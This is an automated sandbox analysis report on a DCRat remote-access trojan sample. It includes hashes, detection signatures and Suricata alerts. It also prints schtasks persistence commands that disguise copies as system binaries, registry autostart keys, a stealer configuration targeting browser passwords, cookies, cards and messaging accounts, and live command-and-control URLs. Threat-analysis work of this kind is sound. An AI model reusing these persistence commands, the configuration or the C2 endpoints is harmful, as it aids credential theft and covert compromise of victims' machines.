Windows Analysis Report
XPC5PMKegV.exe

Overview

General Information

Sample name:XPC5PMKegV.exe
renamed because original name is a hash value
Original sample name:20cf7f39edef3db30f388829c5a3f05c.exe
Analysis ID:1500508
MD5:20cf7f39edef3db30f388829c5a3f05c
SHA1:009eb186382733844b2d8c5202d0da9ac1f8dfb0
SHA256:2554c3bd1b50fccf6833eb50179c877a95fce8135031204e8e678c4d8c5db89f
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XPC5PMKegV.exe (PID: 4924 cmdline: "C:\Users\user\Desktop\XPC5PMKegV.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
    • schtasks.exe (PID: 1708 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1600 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1668 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5344 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1908 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4188 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2912 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6568 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6040 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5764 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2196 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3560 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3052 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2820 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1460 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5960 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7044 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6956 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3164 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6272 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6248 cmdline: schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3248 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 6928 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • xMLVfJVxhYAkoCJ.exe (PID: 6248 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 6684 cmdline: C:\Recovery\xMLVfJVxhYAkoCJ.exe MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • Registry.exe (PID: 432 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • Registry.exe (PID: 6844 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • StartMenuExperienceHost.exe (PID: 6840 cmdline: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • StartMenuExperienceHost.exe (PID: 5060 cmdline: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • System.exe (PID: 1708 cmdline: "C:\Program Files (x86)\microsoft.net\System.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • System.exe (PID: 1600 cmdline: "C:\Program Files (x86)\microsoft.net\System.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 1912 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 5204 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • Registry.exe (PID: 1212 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • StartMenuExperienceHost.exe (PID: 6320 cmdline: "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • System.exe (PID: 5764 cmdline: "C:\Program Files (x86)\microsoft.net\System.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • xMLVfJVxhYAkoCJ.exe (PID: 6316 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" MD5: 20CF7F39EDEF3DB30F388829C5A3F05C)
  • cleanup
{"SCRT": "{\"p\":\"~\",\"B\":\"$\",\"3\":\"*\",\"J\":\"#\",\"c\":\",\",\"i\":\"_\",\"m\":\"!\",\"U\":\"^\",\"V\":\" \",\"b\":\"(\",\"2\":\"<\",\"F\":\">\",\"I\":\".\",\"s\":\"-\",\"M\":\"|\",\"C\":\";\",\"R\":\")\",\"a\":\"@\",\"1\":\"&\",\"6\":\"`\",\"G\":\"%\"}", "PCRT": "{\"v\":\"%\",\"0\":\"!\",\"Q\":\",\",\"Y\":\"|\",\"U\":\"^\",\"F\":\"&\",\"d\":\"`\",\"R\":\"*\",\"K\":\"$\",\"V\":\"(\",\"Z\":\"~\",\"x\":\" \",\"3\":\"-\",\"B\":\";\",\"G\":\">\",\"I\":\"<\",\"X\":\"@\",\"W\":\")\",\"t\":\"#\",\"N\":\".\",\"4\":\"_\"}", "TAG": "m", "MUTEX": "DCR_MUTEX-WVn4oNZYFAP9yGpaqtNX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
Source | Rule | Description | Author | Strings
00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000023.00000002.2323041315.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000021.00000002.2231770511.00000000029BF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

            System Summary

            Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XPC5PMKegV.exe, ProcessId: 4924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMLVfJVxhYAkoCJ
            Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\xMLVfJVxhYAkoCJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XPC5PMKegV.exe, ProcessId: 4924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xMLVfJVxhYAkoCJ
            Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\xMLVfJVxhYAkoCJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XPC5PMKegV.exe, ProcessId: 4924, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
            Timestamp:2024-08-28T15:33:05.344387+0200
            SID:2034194
            Severity:1
            Source Port:51868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:36.984645+0200
            SID:2034194
            Severity:1
            Source Port:51883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:21.097692+0200
            SID:2034194
            Severity:1
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:37.126376+0200
            SID:2034194
            Severity:1
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:59.790382+0200
            SID:2034194
            Severity:1
            Source Port:51891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:31.565096+0200
            SID:2034194
            Severity:1
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:06.567162+0200
            SID:2034194
            Severity:1
            Source Port:51870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:21.697481+0200
            SID:2034194
            Severity:1
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:35.764312+0200
            SID:2034194
            Severity:1
            Source Port:51881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:37.876203+0200
            SID:2034194
            Severity:1
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:42.156568+0200
            SID:2034194
            Severity:1
            Source Port:51885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:22.963796+0200
            SID:2034194
            Severity:1
            Source Port:51875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:04.720687+0200
            SID:2034194
            Severity:1
            Source Port:51867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:20.478417+0200
            SID:2034194
            Severity:1
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:35.893759+0200
            SID:2034194
            Severity:1
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:24.207738+0200
            SID:2034194
            Severity:1
            Source Port:51877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:42.765236+0200
            SID:2034194
            Severity:1
            Source Port:51886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:23.579696+0200
            SID:2034194
            Severity:1
            Source Port:51876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:48.124816+0200
            SID:2034194
            Severity:1
            Source Port:51859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:29.712573+0200
            SID:2034194
            Severity:1
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:43.410775+0200
            SID:2034194
            Severity:1
            Source Port:51887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:48.730443+0200
            SID:2034194
            Severity:1
            Source Port:51860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:13.321787+0200
            SID:2034194
            Severity:1
            Source Port:51873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:54.044731+0200
            SID:2034194
            Severity:1
            Source Port:51864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:44.007271+0200
            SID:2034194
            Severity:1
            Source Port:51888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:30.956596+0200
            SID:2034194
            Severity:1
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:59.191453+0200
            SID:2034194
            Severity:1
            Source Port:51890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:36.518457+0200
            SID:2034194
            Severity:1
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:58.527866+0200
            SID:2034194
            Severity:1
            Source Port:51889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:24.813155+0200
            SID:2034194
            Severity:1
            Source Port:51878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:19.857080+0200
            SID:2034194
            Severity:1
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:34:00.390952+0200
            SID:2034194
            Severity:1
            Source Port:51892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:47.497104+0200
            SID:2034194
            Severity:1
            Source Port:51858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:11.912213+0200
            SID:2034194
            Severity:1
            Source Port:51871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:13.921189+0200
            SID:2034194
            Severity:1
            Source Port:51874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:12.521816+0200
            SID:2034194
            Severity:1
            Source Port:51872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:37.591556+0200
            SID:2034194
            Severity:1
            Source Port:51884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:36.379420+0200
            SID:2034194
            Severity:1
            Source Port:51882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:33:05.947903+0200
            SID:2034194
            Severity:1
            Source Port:51869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:54.639914+0200
            SID:2034194
            Severity:1
            Source Port:51865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:52.796486+0200
            SID:2034194
            Severity:1
            Source Port:51862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:53.437128+0200
            SID:2034194
            Severity:1
            Source Port:51863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:30.339189+0200
            SID:2034194
            Severity:1
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-28T15:32:49.326493+0200
            SID:2034194
            Severity:1
            Source Port:51861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: XPC5PMKegV.exe | Avira: detected
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16BcAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGTAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0eAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchNAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44Avira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdNAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgAAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0rAvira URL Cloud: Label: malware
            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlMAvira URL Cloud: Label: malware
